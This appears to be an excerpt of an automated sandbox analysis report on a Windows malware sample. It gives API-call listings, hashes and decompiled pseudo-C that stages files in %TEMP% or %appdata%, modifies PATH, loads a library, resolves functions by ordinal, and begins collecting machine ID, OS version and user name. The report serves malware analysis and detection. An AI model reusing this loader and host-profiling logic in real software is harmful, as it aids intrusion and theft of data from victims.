                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                              				intOrPtr* _t96;
                                                                                                                                                                                              				intOrPtr* _t102;
                                                                                                                                                                                              				intOrPtr* _t107;
                                                                                                                                                                                              				intOrPtr* _t210;
                                                                                                                                                                                              				void* _t225;
                                                                                                                                                                                              				intOrPtr _t243;
                                                                                                                                                                                              				void* _t269;
                                                                                                                                                                                              				intOrPtr _t271;
                                                                                                                                                                                              				intOrPtr _t272;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t268 = __esi;
                                                                                                                                                                                              				asm("das");
                                                                                                                                                                                              				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t271 = _t272;
                                                                                                                                                                                              				_t225 = 0xd;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t225 = _t225 - 1;
                                                                                                                                                                                              					_t274 = _t225;
                                                                                                                                                                                              				} while (_t225 != 0);
                                                                                                                                                                                              				_push(_t225);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t271);
                                                                                                                                                                                              				_push(0x408781);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t272;
                                                                                                                                                                                              				 *0x41b0d8 = 0;
                                                                                                                                                                                              				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                              				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
                                                                                                                                                                                              				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
                                                                                                                                                                                              				E00403D2C( &_v16, _v20);
                                                                                                                                                                                              				_push(L"%TEMP%\\");
                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                              				_push(0x4087a8);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E004062D8(_v36,  &_v32, _t274);
                                                                                                                                                                                              				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                              				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274);
                                                                                                                                                                                              				E0040813C(9,  &_v44);
                                                                                                                                                                                              				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
                                                                                                                                                                                              				_t95 = E004076B0(_v40, 0x41c7bc, _v44);
                                                                                                                                                                                              				_t275 = _t95;
                                                                                                                                                                                              				if(_t95 == 0) {
                                                                                                                                                                                              					_push(L"%appdata%\\");
                                                                                                                                                                                              					_push(_v16);
                                                                                                                                                                                              					_push(0x4087a8);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					E004062D8(_v52,  &_v48, _t275);
                                                                                                                                                                                              					E00403BBC(0x41c7c0, _v48);
                                                                                                                                                                                              					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t96 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
                                                                                                                                                                                              				_t276 = _t269;
                                                                                                                                                                                              				if(_t269 > 0) {
                                                                                                                                                                                              					E004040B0( &_v12, _t269);
                                                                                                                                                                                              					_t210 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				_t102 =  *0x41b614; // 0x41c6ac
                                                                                                                                                                                              				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
                                                                                                                                                                                              				_t107 =  *0x41b5e4; // 0x41c6b4
                                                                                                                                                                                              				 *((intOrPtr*)( *_t107))(E00403D3C( *0x41c7c0));
                                                                                                                                                                                              				E0040813C(9,  &_v60);
                                                                                                                                                                                              				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
                                                                                                                                                                                              				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
                                                                                                                                                                                              				if( *0x41c7bc != 0) {
                                                                                                                                                                                              					E00408120(0x84,  &_v64);
                                                                                                                                                                                              					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
                                                                                                                                                                                              					E00408120(0x85,  &_v68);
                                                                                                                                                                                              					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
                                                                                                                                                                                              					E00408120(0x86,  &_v72);
                                                                                                                                                                                              					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
                                                                                                                                                                                              					E00408120(0x87,  &_v76);
                                                                                                                                                                                              					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
                                                                                                                                                                                              					E00408120(0x88,  &_v80);
                                                                                                                                                                                              					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
                                                                                                                                                                                              					E00408120(0x89,  &_v84);
                                                                                                                                                                                              					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
                                                                                                                                                                                              					E00408120(0x8a,  &_v88);
                                                                                                                                                                                              					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
                                                                                                                                                                                              					E00408120(0x12,  &_v92);
                                                                                                                                                                                              					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
                                                                                                                                                                                              					E00408120(0x13,  &_v96);
                                                                                                                                                                                              					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
                                                                                                                                                                                              					E00408120(0x14,  &_v100);
                                                                                                                                                                                              					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
                                                                                                                                                                                              					E00408120(0x15,  &_v104);
                                                                                                                                                                                              					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
                                                                                                                                                                                              					E00408120(0x16,  &_v108);
                                                                                                                                                                                              					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
                                                                                                                                                                                              					E00408120(0x17,  &_v112);
                                                                                                                                                                                              					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
                                                                                                                                                                                              					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
                                                                                                                                                                                              						 *0x41b0d8 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t243);
                                                                                                                                                                                              				 *[fs:eax] = _t243;
                                                                                                                                                                                              				_push(E00408788);
                                                                                                                                                                                              				E00403508( &_v112, 0xd);
                                                                                                                                                                                              				E00403B98( &_v60, 8);
                                                                                                                                                                                              				E00403508( &_v28, 3);
                                                                                                                                                                                              				E00403B98( &_v16, 2);
                                                                                                                                                                                              				return E004034E4( &_v8);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                              • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                                                                                                                                              • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				intOrPtr* _t94;
                                                                                                                                                                                              				intOrPtr* _t100;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr* _t208;
                                                                                                                                                                                              				void* _t223;
                                                                                                                                                                                              				intOrPtr _t241;
                                                                                                                                                                                              				void* _t267;
                                                                                                                                                                                              				intOrPtr _t269;
                                                                                                                                                                                              				intOrPtr _t270;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t266 = __esi;
                                                                                                                                                                                              				_t269 = _t270;
                                                                                                                                                                                              				_t223 = 0xd;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t223 = _t223 - 1;
                                                                                                                                                                                              					_t271 = _t223;
                                                                                                                                                                                              				} while (_t223 != 0);
                                                                                                                                                                                              				_push(_t223);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t269);
                                                                                                                                                                                              				_push(0x408781);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t270;
                                                                                                                                                                                              				 *0x41b0d8 = 0;
                                                                                                                                                                                              				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                              				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
                                                                                                                                                                                              				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
                                                                                                                                                                                              				E00403D2C( &_v16, _v20);
                                                                                                                                                                                              				_push(L"%TEMP%\\");
                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                              				_push(0x4087a8);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E004062D8(_v36,  &_v32, _t271);
                                                                                                                                                                                              				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                              				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271);
                                                                                                                                                                                              				E0040813C(9,  &_v44);
                                                                                                                                                                                              				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
                                                                                                                                                                                              				_t93 = E004076B0(_v40, 0x41c7bc, _v44);
                                                                                                                                                                                              				_t272 = _t93;
                                                                                                                                                                                              				if(_t93 == 0) {
                                                                                                                                                                                              					_push(L"%appdata%\\");
                                                                                                                                                                                              					_push(_v16);
                                                                                                                                                                                              					_push(0x4087a8);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					E004062D8(_v52,  &_v48, _t272);
                                                                                                                                                                                              					E00403BBC(0x41c7c0, _v48);
                                                                                                                                                                                              					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t94 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
                                                                                                                                                                                              				_t273 = _t267;
                                                                                                                                                                                              				if(_t267 > 0) {
                                                                                                                                                                                              					E004040B0( &_v12, _t267);
                                                                                                                                                                                              					_t208 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				_t100 =  *0x41b614; // 0x41c6ac
                                                                                                                                                                                              				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
                                                                                                                                                                                              				_t105 =  *0x41b5e4; // 0x41c6b4
                                                                                                                                                                                              				 *((intOrPtr*)( *_t105))(E00403D3C( *0x41c7c0));
                                                                                                                                                                                              				E0040813C(9,  &_v60);
                                                                                                                                                                                              				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
                                                                                                                                                                                              				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
                                                                                                                                                                                              				if( *0x41c7bc != 0) {
                                                                                                                                                                                              					E00408120(0x84,  &_v64);
                                                                                                                                                                                              					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
                                                                                                                                                                                              					E00408120(0x85,  &_v68);
                                                                                                                                                                                              					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
                                                                                                                                                                                              					E00408120(0x86,  &_v72);
                                                                                                                                                                                              					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
                                                                                                                                                                                              					E00408120(0x87,  &_v76);
                                                                                                                                                                                              					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
                                                                                                                                                                                              					E00408120(0x88,  &_v80);
                                                                                                                                                                                              					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
                                                                                                                                                                                              					E00408120(0x89,  &_v84);
                                                                                                                                                                                              					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
                                                                                                                                                                                              					E00408120(0x8a,  &_v88);
                                                                                                                                                                                              					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
                                                                                                                                                                                              					E00408120(0x12,  &_v92);
                                                                                                                                                                                              					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
                                                                                                                                                                                              					E00408120(0x13,  &_v96);
                                                                                                                                                                                              					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
                                                                                                                                                                                              					E00408120(0x14,  &_v100);
                                                                                                                                                                                              					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
                                                                                                                                                                                              					E00408120(0x15,  &_v104);
                                                                                                                                                                                              					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
                                                                                                                                                                                              					E00408120(0x16,  &_v108);
                                                                                                                                                                                              					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
                                                                                                                                                                                              					E00408120(0x17,  &_v112);
                                                                                                                                                                                              					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
                                                                                                                                                                                              					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
                                                                                                                                                                                              						 *0x41b0d8 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t241);
                                                                                                                                                                                              				 *[fs:eax] = _t241;
                                                                                                                                                                                              				_push(E00408788);
                                                                                                                                                                                              				E00403508( &_v112, 0xd);
                                                                                                                                                                                              				E00403B98( &_v60, 8);
                                                                                                                                                                                              				E00403508( &_v28, 3);
                                                                                                                                                                                              				E00403B98( &_v16, 2);
                                                                                                                                                                                              				return E004034E4( &_v8);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              • Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                              • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 44%
                                                                                                                                                                                              			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				signed char _t59;
                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                                                              				void* _t181;
                                                                                                                                                                                              				intOrPtr _t184;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t182 = __esi;
                                                                                                                                                                                              				_t59 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				asm("das");
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				 *__edx =  *__edx + _t59;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				 *_t59 =  *_t59 & _t59;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				_t60 = _t59 +  *_t59;
                                                                                                                                                                                              				 *_t60 =  *_t60 + _t60;
                                                                                                                                                                                              				 *_t60 =  *_t60 + _t60;
                                                                                                                                                                                              				_t184 = _t185;
                                                                                                                                                                                              				_t143 = 0xc;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t143 = _t143 - 1;
                                                                                                                                                                                              					_t191 = _t143;
                                                                                                                                                                                              				} while (_t143 != 0);
                                                                                                                                                                                              				_t142 = _t60;
                                                                                                                                                                                              				_push(_t184);
                                                                                                                                                                                              				_push(0x41757c);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t185;
                                                                                                                                                                                              				_push("MachineID :   ");
                                                                                                                                                                                              				E00406C4C( &_v8, _t142, __esi);
                                                                                                                                                                                              				_push(_v8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("EXE_PATH  :   ");
                                                                                                                                                                                              				E00416F88(0,  &_v12);
                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("Windows    :   ");
                                                                                                                                                                                              				E00407A4C( &_v28, _t142, _t181, __esi);
                                                                                                                                                                                              				_push(_v28);
                                                                                                                                                                                              				_push(0x4175f4);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				E00403D2C( &_v20, _v24);
                                                                                                                                                                                              				_push(_v20);
                                                                                                                                                                                              				E004066C0( &_v32, _t191);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				_push(0x4175fc);
                                                                                                                                                                                              				E00406BB4( &_v36);
                                                                                                                                                                                              				_push(_v36);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t142, _v16);
                                                                                                                                                                                              				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
                                                                                                                                                                                              				E00403D2C( &_v44, _v48);
                                                                                                                                                                                              				_push(_v44);
                                                                                                                                                                                              				E00406610( &_v52);
                                                                                                                                                                                              				_push(_v52);
